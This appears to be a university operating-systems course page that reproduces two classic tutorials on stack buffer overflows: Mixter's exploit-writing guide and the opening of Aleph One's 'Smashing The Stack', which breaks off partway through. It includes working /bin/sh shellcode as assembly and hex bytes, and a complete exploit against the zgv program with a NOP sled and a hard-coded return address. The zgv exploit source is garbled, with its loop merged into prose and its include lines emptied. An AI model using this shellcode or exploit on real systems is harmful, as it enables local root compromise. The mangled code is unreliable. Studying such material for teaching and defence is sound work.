COP 4610: OPERATING SYSTEMS & CONCURRENT PROGRAMMING

Writing Buffer and Heap Overflow Exploits

 

The following articles were found on the Web, using the Google search engine with keywords "buffer overflow exploit". They were all posted at http://www.11a.nu/stack/exploit.txt. A cleaner version of the first article, in HTML, was posted at http://www.securiteam.com/securityreviews/5OP0B006UQ.html.

Article 1

      Writing buffer overflow exploits - a tutorial for beginners
      ===========================================================

    Security papers - members.tripod.com/mixtersecurity/papers.html

Buffer overflows in buffers that depend on user input have become one
of the biggest security hazards on the internet and to modern computing
in general. This is because such an error can easily be made at the
programming level, and while it is invisible to the user who does not
understand or cannot acquire the source code, many of those errors are
easy to exploit. This paper makes an attempt to teach the novice to
average C programmer how an overflow condition can be proven to be
exploitable.

Mixter

_______________________________________________________________________________

1. Memory

Note: Memory for a process is organized the way I describe it here on most
      computers, but the details depend on the processor architecture.
      This example is for x86 and also roughly applies to sparc.

The principle of exploiting a buffer overflow is to overwrite parts of
memory which aren't supposed to be overwritten with arbitrary input,
and to make the process execute this input as code. To see how and
where an overflow takes place, let's take a look at how memory is
organized.  A page is a part of memory that uses its own relative
addressing, meaning the kernel allocates initial memory for the
process, which it can then access without having to know where the
memory is physically located in RAM. The process's memory consists of
three sections:

 - code segment, data in this segment are assembler instructions that
   the processor executes. The code execution is non-linear, it can skip
   code, jump, and call functions on certain conditions. Therefore, we
   have a pointer called EIP, or instruction pointer. The address where
   EIP points to always contains the code that will be executed next.

 - data segment, space for variables and dynamic buffers

 - stack segment, which is used to pass data (arguments) to functions
   and as a space for variables of functions. The bottom (start) of the
   stack usually resides at the very end of the virtual memory of a page,
   and grows down. The assembler command PUSHL will add to the top of the
   stack, and POPL will remove one item from the top of the stack and put
   it in a register. For accessing the stack memory directly, there is
   the stack pointer ESP that points at the top (lowest memory address)
   of the stack.

_______________________________________________________________________________

2. Functions

A function is a piece of code in the code segment, that is called,
performs a task, and then returns to the previous thread of execution.
Optionally, arguments can be passed to a function. In assembler, it
usually looks like this (very simple example, just to get the idea):

memory address    code
0x8054321         pushl $0x0
0x8054322         call $0x80543a0
0x8054327         ret
0x8054328         leave
...
0x80543a0         popl %eax
0x80543a1         addl $0x1337,%eax
0x80543a4         ret

What happens here? The main function calls function(0). The argument
is 0; main pushes it onto the stack and calls the function. The
function gets the argument from the stack using popl.  After
finishing, it returns to 0x8054327. Commonly, the function would also
push register EBP onto the stack on entry and restore it after
finishing. This is the frame pointer concept, which allows the
function to use its own offsets for addressing. It is mostly
uninteresting while dealing with exploits, because the function will
not return to the original execution thread anyways. :-) We just have
to know what the stack looks like. At the top, we have the internal
buffers and variables of the function. After this, there is the saved
EBP register (32 bits, which is 4 bytes), and then the return address,
which is again 4 bytes. Further down, there are the arguments passed
to the function, which are uninteresting to us.  In this case, our
return address is 0x8054327. It is automatically stored on the stack
when the function is called. This return address can be overwritten,
and changed to point to any location in memory, if there is an
overflow somewhere in the code.

_______________________________________________________________________________

3. Example of an exploitable program

Let's assume that we exploit a function like this:

void lame (void) { char small[30]; gets (small); printf("%s\n", small); }
main() { lame (); return 0; }

Compile and disassemble it:
# cc -ggdb blah.c -o blah
/tmp/cca017401.o: In function `lame':
/root/blah.c:1: the `gets' function is dangerous and should not be used.
# gdb blah
/* short explanation: gdb, the GNU debugger is used here to read the
   binary file and disassemble it (translate bytes to assembler code) */
(gdb) disas main
Dump of assembler code for function main:
0x80484c8:  pushl  %ebp
0x80484c9:  movl   %esp,%ebp
0x80484cb:  call   0x80484a0
0x80484d0:  leave
0x80484d1:  ret
(gdb) disas lame
Dump of assembler code for function lame:
/* saving the frame pointer onto the stack right before the ret address */
0x80484a0:  pushl  %ebp
0x80484a1:  movl   %esp,%ebp
/* enlarge the stack by 0x20 or 32. our buffer is 30 characters, but the
   memory is allocated 4byte-wise (because the processor uses 32bit words)
   this is the equivalent to: char small[30]; */
0x80484a3:  subl   $0x20,%esp
/* load a pointer to small[30] (the space on the stack, which is located
   at virtual address 0xffffffe0(%ebp)) on the stack, and call
   the gets function: gets(small); */
0x80484a6:  leal   0xffffffe0(%ebp),%eax
0x80484a9:  pushl  %eax
0x80484aa:  call   0x80483ec
0x80484af:  addl   $0x4,%esp
/* load the address of small and the address of "%s\n" string on stack
   and call the print function: printf("%s\n", small); */
0x80484b2:  leal   0xffffffe0(%ebp),%eax
0x80484b5:  pushl  %eax
0x80484b6:  pushl  $0x804852c
0x80484bb:  call   0x80483dc
0x80484c0:  addl   $0x8,%esp
/* get the return address, 0x80484d0, from stack and return to that address.
   you don't see that explicitly here because it is done by the CPU as 'ret' */
0x80484c3:  leave
0x80484c4:  ret
End of assembler dump.

3a. Overflowing the program

# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx     <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Segmentation fault (core dumped)
# gdb blah core
(gdb) info registers
     eax:       0x24          36
     ecx:  0x804852f   134513967
     edx:        0x1           1
     ebx:   0x11a3c8     1156040
     esp: 0xbffffdb8 -1073742408
     ebp:   0x787878     7895160
            ^^^^^^

EBP is 0x787878, this means that we have written more data on the
stack than the input buffer could handle. 0x78 is the hex
representation of 'x'. The process had a buffer of 32 bytes maximum
size. We have written more data into memory than allocated for user
input and therefore overwritten EBP and the return address with
'xxxx', and the process tried to resume execution at address
0x787878, which caused it to get a segmentation fault.

3b. Changing the return address

Let's try to exploit the program so that it returns to the call to
lame() instead of returning normally. We have to change return address
0x80484d0 to 0x80484cb, that is all. In memory, we have:

32 bytes buffer space | 4 bytes saved EBP | 4 bytes RET

Here is a simple program to put the 4byte return address into a 1byte
character buffer:

main()
{
int i=0; char buf[44];
for (i=0;i<=40;i+=4)
*(long *) &buf[i] = 0x80484cb;
puts(buf);
}

# ret
ËËËËËËËËËËË,

# (ret;cat)|./blah
test                    <- user input
ËËËËËËËËËËË,test
test                    <- user input
test

Here we are, the program went through the function two times. If an
overflow is present, the return address of functions can be changed
to alter the program's execution thread.

_______________________________________________________________________________

4. Shellcode

To keep it simple, shellcode is simply assembler commands, which we
write on the stack and then change the return address to return to the
stack. Using this method, we can insert code into a vulnerable process
and then execute it right on the stack. So, let's generate insertable
assembler code to run a shell. A common system call is execve(), which
loads and runs any binary, terminating execution of the current
process. The manpage gives us the usage:

int execve (const char *filename, char *const argv [], char *const envp[]);

Let's get the details of the system call from glibc2:

# gdb /lib/libc.so.6
(gdb) disas execve
Dump of assembler code for function execve:
0x5da00:  pushl  %ebx
/* this is the actual syscall. before a program would call execve, it would
   push the arguments in reverse order on the stack: **envp, **argv, *filename */
/* put address of **envp into edx register */
0x5da01:  movl   0x10(%esp,1),%edx
/* put address of **argv into ecx register */
0x5da05:  movl   0xc(%esp,1),%ecx
/* put address of *filename into ebx register */
0x5da09:  movl   0x8(%esp,1),%ebx
/* put 0xb in eax register; 0xb == execve in the internal system call table */
0x5da0d:  movl   $0xb,%eax
/* give control to kernel, to execute execve instruction */
0x5da12:  int    $0x80
0x5da14:  popl   %ebx
0x5da15:  cmpl   $0xfffff001,%eax
0x5da1a:  jae    0x5da1d <__syscall_error>
0x5da1c:  ret
End of assembler dump.

4a. making the code portable

We have to apply a trick to be able to make shellcode without having
to reference the arguments in memory the conventional way, by giving
their exact address on the memory page, which can only be done at
compile time. Once we can estimate the size of the shellcode, we can
use the instructions jmp and call to go a specified number of bytes
back or forth in the execution thread. Why use a call? We have the
opportunity that a CALL will automatically store the return address on
the stack, the return address being the next 4 bytes after the CALL
instruction. By placing a variable right behind the call, we
indirectly push its address on the stack without having to know it.

0   jmp             (skip Z bytes forward)
2   popl %esi
... put function(s) here ...
Z   call <-Z+2>     (skip 2 less than Z bytes backward, to POPL)
Z+5 .string         (first variable)

(Note: If you're going to write code more complex than for spawning a
simple shell, you can put more than one .string behind the code. You
know the size of those strings and can therefore calculate their
relative locations once you know where the first string is located.)

4b. the shellcode

global code_start               /* we'll need this later, dont mind it */
global code_end
        .data
code_start:
        jmp  0x17
        popl %esi
        movl %esi,0x8(%esi)     /* put address of **argv behind shellcode,
                                   0x8 bytes behind it so a /bin/sh has place */
        xorl %eax,%eax          /* put 0 in %eax */
        movb %eax,0x7(%esi)     /* put terminating 0 after /bin/sh string */
        movl %eax,0xc(%esi)     /* another 0 to get the size of a long word */
my_execve:
        movb $0xb,%al           /* execve(         */
        movl %esi,%ebx          /* "/bin/sh",      */
        leal 0x8(%esi),%ecx     /* & of "/bin/sh", */
        xorl %edx,%edx          /* NULL            */
        int  $0x80              /* );              */
        call -0x1c
        .string "/bin/shX"      /* X is overwritten by movb %eax,0x7(%esi) */
code_end:

(The relative offsets 0x17 and -0x1c can be gained by putting in 0x0,
compiling, disassembling and then looking at the shellcode's size.)

This is already working shellcode, though very minimal. You should at
least disassemble the exit() syscall and attach it (before the
'call'). The real art of making shellcode also consists of avoiding
any binary zeroes in the code (a zero very often indicates the end of
input or of a buffer) and modifying it, for example, so the binary
code does not contain control or lower case characters, which would
get filtered out by some vulnerable programs. Most of this stuff is
done by self-modifying code, like we had in the movb %eax,0x7(%esi)
instruction. We replaced the X with \0, but without having a \0 in the
shellcode initially...

Let's test this code... save the above code as code.S (remove
comments) and the following file as code.c:

extern void code_start();
extern void code_end();
#include
main() { ((void (*)(void)) code_start)(); }

# cc -o code code.S code.c
# ./code
bash#

You can now convert the shellcode to a hex char buffer. The best way
to do this is to print it out:

#include
extern void code_start(); extern void code_end();
main() { fprintf(stderr,"%s",code_start); }

and parse it through aconv -h or bin2c.pl. Those tools can be found
at: http://www.dec.net/~dhg or http://members.tripod.com/mixtersecurity

_______________________________________________________________________________

5. Writing an exploit

Let us take a look at how to change the return address to point to
shellcode put on the stack, and write a sample exploit. We will take
zgv, because that is one of the easiest things to exploit out there :)

# export HOME=`perl -e 'printf "a" x 2000'`
# zgv
Segmentation fault (core dumped)
# gdb /usr/bin/zgv core
#0  0x61616161 in ?? ()
(gdb) info register esp
     esp: 0xbffff574 -1073744524

Well, this is the top of the stack at crash time. It is safe to
presume that we can use this as return address to our shellcode.

We will now add some NOP (no operation) instructions before our
buffer, so we don't have to be 100% correct regarding the prediction
of the exact start of our shellcode in memory (or even brute forcing
it). The function will return onto the stack somewhere before our
shellcode, work its way through the NOPs to the initial JMP command,
jump to the CALL, jump back to the popl, and run our code on the
stack.

Remember, the stack looks like this: at the lowest memory address, the
top of the stack where ESP points to, the initial variables are
stored, namely the buffer in zgv that stores the HOME environment
variable. After that, we have the saved EBP (4 bytes) and the return
address of the previous function. We must write 8 bytes or more behind
the buffer to overwrite the return address with our new address on the
stack.

The buffer in zgv is 1024 bytes big. You can find that out by glancing
at the code, or by searching for the initial subl $0x400,%esp (=1024)
in the vulnerable function. We will now put all those parts together
in the exploit:

5a. Sample zgv exploit

/*                   zgv v3.0 exploit by Mixter
          buffer overflow tutorial - http://1337.tsx.org

        sample exploit, works for example with precompiled
    redhat 5.x/suse 5.x/redhat 6.x/slackware 3.x linux binaries */

#include
#include
#include

/* This is the minimal shellcode from the tutorial */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP     0x90
#define LEN     1032
#define RET     0xbffff574

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;

fprintf(stderr,"using address 0x%lx\n",retaddr);

/* this fills the whole buffer with the return address, see 3b) */
for (i=0;i function() -> strcpy(smallbuffer,getenv("HOME"));

At this point, zgv fails to do bounds checking, writes beyond
smallbuffer, and the return address to main is overwritten with the
return address on the stack. function() does leave/ret and the EIP
points onto the stack:

0xbffff574 nop
0xbffff575 nop
0xbffff576 nop
0xbffff577 jmp $0x24                 1
0xbffff579 popl %esi          3 <--\ |
[... shellcode starts here ...]    | |
0xbffff59b call -$0x1c             2 <--/
0xbffff59e .string "/bin/shX"

Let's test the exploit...

# cc -o zgx zgx.c
# ./zgx
using address 0xbffff574
bash#

5b. further tips on writing exploits

There are a lot of programs which are tough to exploit, but
nonetheless vulnerable. However, there are a lot of tricks you can do
to get behind filtering and such. There are also other overflow
techniques which do not necessarily include changing the return
address at all or only the return address. There are so-called pointer
overflows, where a pointer that a function allocates can be
overwritten by an overflow, altering the program's execution flow (an
example is the RoTShB bind 4.9 exploit), and exploits where the return
address points to the shell's environment pointer, where the shellcode
is located instead of being on the stack (this defeats very small
buffers, and Non-executable stack patches, and can fool some security
programs, though it can only be performed locally).

Another important subject for the skilled shellcode author is
radically self-modifying code, which initially only consists of
printable, non-white upper case characters, and then modifies itself
to put functional shellcode on the stack which it executes, etc.

You should never, ever have any binary zeroes in your shellcode,
because it will most probably not work if it contains any. But
discussing how to substitute certain assembler commands with others
would go beyond the scope of this paper. I also suggest reading the
other great overflow howto's out there, written by aleph1, Taeoh Oh
and mudge.

5c. important note

You will NOT be able to use this tutorial on Windows or Macintosh. Do
NOT ask me for cc.exe and gdb.exe either! =oP

_______________________________________________________________________________

6. Conclusions

We have learned that once an overflow is present which is user
dependent, it can be exploited about 90% of the time, even though
exploiting some situations is difficult and takes some skill. Why is
it important to write exploits? Because ignorance is omnipresent in
the software industry. There have already been reports of
vulnerabilities due to buffer overflows in software, though the
software has not been updated, or the majority of users didn't update,
because the vulnerability was hard to exploit and nobody believed it
created a security risk. Then, an exploit actually comes out, proves
that the program is exploitable and makes exploiting it practical, and
there is usually a big (necessary) hurry to update it.

As for the programmer (you), it is a hard task to write secure
programs, but it should be taken very seriously. This is an especially
large concern when writing servers, any type of security programs, or
programs that are suid root, or designed to be run by root, any
special accounts, or the system itself. The main principles I suggest
are: apply bounds checking (strn*, sn* functions instead of sprintf
etc.), prefer allocating buffers of a dynamic, input-dependent size,
be careful with for/while/etc. loops that gather data and stuff it
into a buffer, and generally handle user input with very much care.

The security industry has also made a notable effort to prevent
overflow problems with techniques like non-executable stack, suid
wrappers, guard programs that check return addresses, bounds checking
compilers, and so on. You should make use of those techniques where
possible, but do not fully rely on them. Do not assume to be safe at
all if you run a vanilla two-year old UNIX distribution without
updates, but with overflow protection or (even more stupid)
firewalling/IDS. It cannot assure security if you continue to use
insecure programs, because _all_ security programs are _software_ and
can contain vulnerabilities themselves, or at least not be perfect. If
you apply frequent updates _and_ security measures, you can still not
expect to be secure, _but_ you can hope. :-)

Mixter
http://members.tripod.com/mixtersecurity
 

Article 2

                               .oO Phrack 49 Oo.

                          Volume Seven, Issue Forty-Nine
                                     
                                  File 14 of 16

                      BugTraq, r00t, and Underground.Org
                                   bring you

                     XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
                     Smashing The Stack For Fun And Profit
                     XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

                                 by Aleph One
                             aleph1@underground.org

	`smash the stack` [C programming] n. On many C implementations
	it is possible to corrupt the execution stack by writing past
	the end of an array declared auto in a routine.  Code that does
	this is said to smash the stack, and can cause return from the
	routine to jump to a random address.  This can produce some of
	the most insidious data-dependent bugs known to mankind.
	Variants include trash the stack, scribble the stack, mangle
	the stack; the term mung the stack is not used, as this is
	never done intentionally. See spam; see also alias bug,
	fandango on core, memory leak, precedence lossage, overrun screw.


                                 Introduction
                                 ~~~~~~~~~~~~

   Over the last few months there has been a large increase of buffer
overflow vulnerabilities being both discovered and exploited.  Examples
of these are syslog, splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt 
library, at, etc.  This paper attempts to explain what buffer overflows 
are, and how their exploits work.

   Basic knowledge of assembly is required.  An understanding of virtual 
memory concepts, and experience with gdb are very helpful but not necessary.
We also assume we are working with an Intel x86 CPU, and that the operating 
system is Linux.

   Some basic definitions before we begin: A buffer is simply a contiguous 
block of computer memory that holds multiple instances of the same data 
type.  C programmers normally associate the word buffer with arrays, most
commonly character arrays.  Arrays, like all variables in C, can be 
declared either static or dynamic.  Static variables are allocated at load 
time on the data segment.  Dynamic variables are allocated at run time on 
the stack. To overflow is to flow, or fill over the top, brims, or bounds. 
We will concern ourselves only with the overflow of dynamic buffers, otherwise
known as stack-based buffer overflows.


                          Process Memory Organization
                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~

   To understand what stack buffers are we must first understand how a
process is organized in memory.  Processes are divided into three regions:
Text, Data, and Stack.  We will concentrate on the stack region, but first
a small overview of the other regions is in order.

   The text region is fixed by the program and includes code (instructions)
and read-only data.  This region corresponds to the text section of the
executable file.  This region is normally marked read-only and any attempt to
write to it will result in a segmentation violation.

   The data region contains initialized and uninitialized data.  Static
variables are stored in this region.  The data region corresponds to the
data-bss sections of the executable file.  Its size can be changed with the
brk(2) system call.  If the expansion of the bss data or the user stack
exhausts available memory, the process is blocked and is rescheduled to
run again with a larger memory space. New memory is added between the data
and stack segments.

                             /------------------\  lower
                             |                  |  memory
                             |       Text       |  addresses
                             |                  |
                             |------------------|
                             |   (Initialized)  |
                             |        Data      |
                             |  (Uninitialized) |
                             |------------------|
                             |                  |
                             |       Stack      |  higher
                             |                  |  memory
                             \------------------/  addresses

                         Fig. 1 Process Memory Regions


                               What Is A Stack?
                               ~~~~~~~~~~~~~~~~

   A stack is an abstract data type frequently used in computer science.  A
stack of objects has the property that the last object placed on the stack
will be the first object removed.  This property is commonly referred to as
last in, first out queue, or a LIFO.

   Several operations are defined on stacks.  Two of the most important are
PUSH and POP.  PUSH adds an element at the top of the stack.  POP, in 
contrast, reduces the stack size by one by removing the last element at the 
top of the stack.


                            Why Do We Use A Stack?
                            ~~~~~~~~~~~~~~~~~~~~~~

   Modern computers are designed with the need of high-level languages in
mind.  The most important technique for structuring programs introduced by
high-level languages is the procedure or function.  From one point of view, a
procedure call alters the flow of control just as a jump does, but unlike a
jump, when finished performing its task, a function returns control to the 
statement or instruction following the call.  This high-level abstraction
is implemented with the help of the stack.

  The stack is also used to dynamically allocate the local variables used in
functions, to pass parameters to the functions, and to return values from the
function.


                               The Stack Region
                               ~~~~~~~~~~~~~~~~

   A stack is a contiguous block of memory containing data.  A register called
the stack pointer (SP) points to the top of the stack.  The bottom of the 
stack is at a fixed address.  Its size is dynamically adjusted by the kernel 
at run time. The CPU implements instructions to PUSH onto and POP off of the 
stack. 

   The stack consists of logical stack frames that are pushed when calling a
function and popped when returning.  A stack frame contains the parameters to 
a function, its local variables, and the data necessary to recover the 
previous stack frame, including the value of the instruction pointer at the 
time of the function call.

   Depending on the implementation the stack will either grow down (towards
lower memory addresses), or up.  In our examples we'll use a stack that grows
down.  This is the way the stack grows on many computers including the Intel, 
Motorola, SPARC and MIPS processors.  The stack pointer (SP) is also
implementation dependent.  It may point to the last address on the stack, or 
to the next free available address after the stack.  For our discussion we'll
assume it points to the last address on the stack.

   In addition to the stack pointer, which points to the top of the stack
(lowest numerical address), it is often convenient to have a frame pointer
(FP) which points to a fixed location within a frame.  Some texts also refer
to it as a local base pointer (LB).  In principle, local variables could be
referenced by giving their offsets from SP.  However, as words are pushed onto
the stack and popped from the stack, these offsets change.  Although in some
cases the compiler can keep track of the number of words on the stack and
thus correct the offsets, in some cases it cannot, and in all cases
considerable administration is required.  Furthermore, on some machines, such
as Intel-based processors, accessing a variable at a known distance from SP
requires multiple instructions.

   Consequently, many compilers use a second register, FP, for referencing
both local variables and parameters because their distances from FP do
not change with PUSHes and POPs.  On Intel CPUs, BP (EBP) is used for this 
purpose.  On the Motorola CPUs, any address register except A7 (the stack 
pointer) will do.  Because of the way our stack grows, actual parameters have 
positive offsets and local variables have negative offsets from FP.

   The first thing a procedure must do when called is save the previous FP
(so it can be restored at procedure exit).  Then it copies SP into FP to 
create the new FP, and advances SP to reserve space for the local variables. 
This code is called the procedure prolog.  Upon procedure exit, the stack 
must be cleaned up again, something called the procedure epilog.  The Intel 
ENTER and LEAVE instructions and the Motorola LINK and UNLINK instructions, 
have been provided to do most of the procedure prolog and epilog work 
efficiently. 

   Let us see what the stack looks like in a simple example:

example1.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
   char buffer1[5];
   char buffer2[10];
}

void main() {
  function(1,2,3);
}
------------------------------------------------------------------------------

   To understand what the program does to call function() we compile it with
gcc using the -S switch to generate assembly code output:

$ gcc -S -o example1.s example1.c

   By looking at the assembly language output we see that the call to
function() is translated to:

        pushl $3
        pushl $2
        pushl $1
        call function

    This pushes the 3 arguments to function backwards into the stack, and
calls function().  The instruction 'call' will push the instruction pointer
(IP) onto the stack.  We'll call the saved IP the return address (RET).  The
first thing done in function is the procedure prolog:

        pushl %ebp
        movl %esp,%ebp
        subl $20,%esp

   This pushes EBP, the frame pointer, onto the stack.  It then copies the
current SP onto EBP, making it the new FP pointer.  We'll call the saved FP
pointer SFP.  It then allocates space for the local variables by subtracting
their size from SP.

   We must remember that memory can only be addressed in multiples of the
word size.  A word in our case is 4 bytes, or 32 bits.  So our 5 byte buffer
is really going to take 8 bytes (2 words) of memory, and our 10 byte buffer
is going to take 12 bytes (3 words) of memory.  That is why SP is being
subtracted by 20.  With that in mind our stack looks like this when
function() is called (each space represents a byte):


bottom of                                                            top of
memory                                                               memory
           buffer2       buffer1   sfp   ret   a     b     c
<------   [            ][        ][    ][    ][    ][    ][    ]
	   
top of                                                            bottom of
stack                                                                 stack


                               Buffer Overflows
                               ~~~~~~~~~~~~~~~~

   A buffer overflow is the result of stuffing more data into a buffer than
it can handle.  How can this often found programming error be taken
advantage of to execute arbitrary code?  Let's look at another example:

example2.c
------------------------------------------------------------------------------
void function(char *str) {
   char buffer[16];

   strcpy(buffer,str);
}

void main() {
  char large_string[256];
  int i;

  for( i = 0; i < 255; i++)
    large_string[i] = 'A';

  function(large_string);
}
------------------------------------------------------------------------------

   This program has a function with a typical buffer overflow coding
error.  The function copies a supplied string without bounds checking by
using strcpy() instead of strncpy().  If you run this program you will get a
segmentation violation.  Let's see what its stack looks like when we call
function:


bottom of                                                            top of
memory                                                               memory
                  buffer            sfp   ret   *str
<------          [                ][    ][    ][    ]

top of                                                            bottom of
stack                                                                 stack


   What is going on here?  Why do we get a segmentation violation?  Simple.
strcpy() is copying the contents of *str (large_string[]) into buffer[]
until a null character is found on the string.  As we can see buffer[] is
much smaller than *str.  buffer[] is 16 bytes long, and we are trying to stuff
it with 256 bytes.  This means that all 240 bytes after buffer in the stack
are being overwritten.  This includes the SFP, RET, and even *str!  We had 
filled large_string with the character 'A'.  Its hex character value
is 0x41.  That means that the return address is now 0x41414141.  This is
outside of the process address space.  That is why when the function returns
and tries to read the next instruction from that address you get a 
segmentation violation.

   So a buffer overflow allows us to change the return address of a function.
In this way we can change the flow of execution of the program.  Let's go back
to our first example and recall what the stack looked like:


bottom of                                                            top of
memory                                                               memory
           buffer2       buffer1   sfp   ret   a     b     c
<------   [            ][        ][    ][    ][    ][    ][    ]

top of                                                            bottom of
stack                                                                 stack


   Let's try to modify our first example so that it overwrites the return
address, and demonstrate how we can make it execute arbitrary code.  Just
before buffer1[] on the stack is SFP, and before it, the return address.
That is 4 bytes past the end of buffer1[].  But remember that buffer1[] is
really 2 words, so it's 8 bytes long.  So the return address is 12 bytes from
the start of buffer1[].  We'll modify the return value in such a way that the
assignment statement 'x = 1;' after the function call will be skipped.  To do
so we add 8 bytes to the return address.  Our code is now:

example3.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
   char buffer1[5];
   char buffer2[10];
   int *ret;

   ret = (int *)(buffer1 + 12);
   (*ret) += 8;
}

void main() {
  int x;

  x = 0;
  function(1,2,3);
  x = 1;
  printf("%d\n",x);
}
------------------------------------------------------------------------------

   What we have done is add 12 to buffer1[]'s address.  This new address is
where the return address is stored.  We want to skip past the assignment to
the printf call.  How did we know to add 8 to the return address?  We used a
test value first (for example 1), compiled the program, and then started gdb:

------------------------------------------------------------------------------
[aleph1]$ gdb example3
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000490:      pushl  %ebp
0x8000491:      movl   %esp,%ebp
0x8000493:      subl   $0x4,%esp
0x8000496:      movl   $0x0,0xfffffffc(%ebp)
0x800049d:      pushl  $0x3
0x800049f:      pushl  $0x2
0x80004a1:      pushl  $0x1
0x80004a3:      call   0x8000470
0x80004a8:      addl   $0xc,%esp
0x80004ab:      movl   $0x1,0xfffffffc(%ebp)
0x80004b2:      movl   0xfffffffc(%ebp),%eax
0x80004b5:      pushl  %eax
0x80004b6:      pushl  $0x80004f8
0x80004bb:      call   0x8000378
0x80004c0:      addl   $0x8,%esp
0x80004c3:      movl   %ebp,%esp
0x80004c5:      popl   %ebp
0x80004c6:      ret
0x80004c7:      nop
------------------------------------------------------------------------------

   We can see that when calling function() the RET will be 0x80004a8, and we
want to jump past the assignment at 0x80004ab.  The next instruction we want
to execute is the one at 0x80004b2.  In this dump the distance between the
two is 0x80004b2 - 0x80004a8 = 0xa, or 10 bytes (the 8 used in example3.c
does not match this dump).  The constant added to the return address must
always be taken from the disassembly of the binary actually being run.


                                  Shell Code
                                  ~~~~~~~~~~

   So now that we know that we can modify the return address and the flow of
execution, what program do we want to execute?  In most cases we'll simply
want the program to spawn a shell.  From the shell we can then issue other
commands as we wish.  But what if there is no such code in the program we
are trying to exploit?  How can we place arbitrary instructions into its
address space?  The answer is to place the code we are trying to execute in
the buffer we are overflowing, and overwrite the return address so it points
back into the buffer.
Assuming the stack starts at address 0xFF, and that S stands for the code we
want to execute, the stack would then look like this:


bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c

<------   [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]
           ^                            |
           |____________________________|
top of                                                            bottom of
stack                                                                 stack


   The code to spawn a shell in C looks like:

shellcode.c
------------------------------------------------------------------------------
#include <stdio.h>

void main() {
   char *name[2];

   name[0] = "/bin/sh";
   name[1] = NULL;
   execve(name[0], name, NULL);
}
------------------------------------------------------------------------------

   To find out what it looks like in assembly we compile it, and start up
gdb.  Remember to use the -static flag.  Otherwise the actual code for the
execve system call will not be included.  Instead there will be a reference
to the dynamic C library that would normally be linked in at load time.

------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcode -ggdb -static shellcode.c
[aleph1]$ gdb shellcode
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130:      pushl  %ebp
0x8000131:      movl   %esp,%ebp
0x8000133:      subl   $0x8,%esp
0x8000136:      movl   $0x80027b8,0xfffffff8(%ebp)
0x800013d:      movl   $0x0,0xfffffffc(%ebp)
0x8000144:      pushl  $0x0
0x8000146:      leal   0xfffffff8(%ebp),%eax
0x8000149:      pushl  %eax
0x800014a:      movl   0xfffffff8(%ebp),%eax
0x800014d:      pushl  %eax
0x800014e:      call   0x80002bc <__execve>
0x8000153:      addl   $0xc,%esp
0x8000156:      movl   %ebp,%esp
0x8000158:      popl   %ebp
0x8000159:      ret
End of assembler dump.
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>:   pushl  %ebp
0x80002bd <__execve+1>: movl   %esp,%ebp
0x80002bf <__execve+3>: pushl  %ebx
0x80002c0 <__execve+4>: movl   $0xb,%eax
0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx
0x80002c8 <__execve+12>:        movl   0xc(%ebp),%ecx
0x80002cb <__execve+15>:        movl   0x10(%ebp),%edx
0x80002ce <__execve+18>:        int    $0x80
0x80002d0 <__execve+20>:        movl   %eax,%edx
0x80002d2 <__execve+22>:        testl  %edx,%edx
0x80002d4 <__execve+24>:        jnl    0x80002e6 <__execve+42>
0x80002d6 <__execve+26>:        negl   %edx
0x80002d8 <__execve+28>:        pushl  %edx
0x80002d9 <__execve+29>:        call   0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>:        popl   %edx
0x80002df <__execve+35>:        movl   %edx,(%eax)
0x80002e1 <__execve+37>:        movl   $0xffffffff,%eax
0x80002e6 <__execve+42>:        popl   %ebx
0x80002e7 <__execve+43>:        movl   %ebp,%esp
0x80002e9 <__execve+45>:        popl   %ebp
0x80002ea <__execve+46>:        ret
0x80002eb <__execve+47>:        nop
End of assembler dump.
------------------------------------------------------------------------------

Let's try to understand what is going on here.  We'll start by studying main:

------------------------------------------------------------------------------
0x8000130:      pushl  %ebp
0x8000131:      movl   %esp,%ebp
0x8000133:      subl   $0x8,%esp

        This is the procedure prelude.  It first saves the old frame pointer,
        makes the current stack pointer the new frame pointer, and leaves
        space for the local variables.  In this case it's:

        char *name[2];

        or 2 pointers to a char.  Pointers are a word long, so it leaves
        space for two words (8 bytes).

0x8000136:      movl   $0x80027b8,0xfffffff8(%ebp)

        We copy the value 0x80027b8 (the address of the string "/bin/sh")
        into the first pointer of name[].  This is equivalent to:

        name[0] = "/bin/sh";

0x800013d:      movl   $0x0,0xfffffffc(%ebp)

        We copy the value 0x0 (NULL) into the second pointer of name[].
        This is equivalent to:

        name[1] = NULL;

        The actual call to execve() starts here.

0x8000144:      pushl  $0x0

        We push the arguments to execve() in reverse order onto the stack.
        We start with NULL.

0x8000146:      leal   0xfffffff8(%ebp),%eax

